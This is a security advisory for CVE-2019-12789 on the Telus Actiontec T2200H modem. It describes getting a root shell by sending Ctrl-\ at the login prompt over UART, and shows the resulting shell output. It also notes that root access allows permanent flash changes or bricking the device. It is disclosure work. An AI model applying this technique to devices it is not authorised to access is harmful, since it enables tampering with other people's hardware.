
Telus Actiontec T2200H Local Privilege Escalation

Posted Jun 12, 2019
Authored by Andrew Klaus

Telus Actiontec T2200H with firmware T2200H-31.128L.08 suffers from a local privilege escalation vulnerability.

tags | exploit, local
advisories | CVE-2019-12789
MD5 | e98dd080d3db4e14385e367484d9e1a8


### Device Details
Discovered By: Andrew Klaus (andrew@aklaus.ca)
Vendor: Actiontec (Telus Branded)
Model: T2200H
Affected Firmware: T2200H-31.128L.08
Device Manual: http://static.telus.com/common/cms/files/internet/telus_t2200h_user_manual.pdf

Reported: Sept 2018
CVE: CVE-2019-12789

The Telus Actiontec T2200H is a bonded VDSL2 modem. It
incorporates 2 VDSL2 bonded links with a built-in firewall, bridge mode,
802.11bgn wireless, etc.

### Summary of Findings

By attaching an adapter, such as a Raspberry Pi or other UART adapter,
to the UART pins on the system board, an attacker can use a special
key sequence (Ctrl-\) to obtain a shell with root privileges at the
login prompt.

After gaining root access, the attacker can mount the Linux /dev/md*
jffs2 partitions read-write and make permanent modifications to the
device including disabling features such as remote management, vendor
updating, etc. It can also be used to overwrite the flash storage,
permanently bricking the device.

Other note: I was also able to cross-compile a new full-functionality
BusyBox binary using https://buildroot.org/. By plugging in a USB Mass
Storage Device on the rear of the modem, I was able to dump the firmware
using “busybox dd”.

### PoC (UART output)
Login:
Password: (Ctrl+\)
….
(Long stack trace)
….
#
# cat /etc/image_version
T2200H-311288BGW1521450


# ps aux
PID USER VSZ STAT COMMAND
233 admin 1980 R -/bin/sh
251 admin 0 DW< [kthread]
269 admin 0 SW [kpAliveWatchdog]
301 admin 0 SW [bcmsw]
302 admin 0 SW [bcmsw_timer]
355 500 2344 S /bin/dbus-daemon --system
372 admin 1976 S syslogd -n -C -l 5
373 admin 1952 S klogd -n
911 admin 1732 S /bin/wlevt
1041 admin 0 SW [dsl0]
1273 admin 7084 S swmdk
1401 admin 1800 S ./pmd
1451 admin 5304 S smbd -D
1540 admin 7084 S swmdk
1541 admin 7084 S swmdk
1544 admin 7084 S swmdk
1569 admin 5304 S smbd -D
1661 admin 1304 S /bin/lld2d br0
1785 admin 1240 S /bin/eapd
1803 admin 1676 S /bin/nas
2129 admin 1344 S /bin/acsd
2175 admin 3132 R /bin/wps_monitor
2262 admin 3916 S ./data_center
5941 admin 2924 S dhcp6s -c /var/dhcp6s.conf br0
6018 admin 896 S radvd -C /var/radvd.conf

# mount
rootfs on / type rootfs (rw)
mtd:rootfs on / type jffs2 (ro,relatime)
proc on /proc type proc (rw,relatime)
tmpfs on /var type tmpfs (rw,relatime,size=420k)
tmpfs on /mnt type tmpfs (rw,relatime,size=16k)
sysfs on /sys type sysfs (rw,relatime)
mtd:data on /data type jffs2 (rw,relatime)





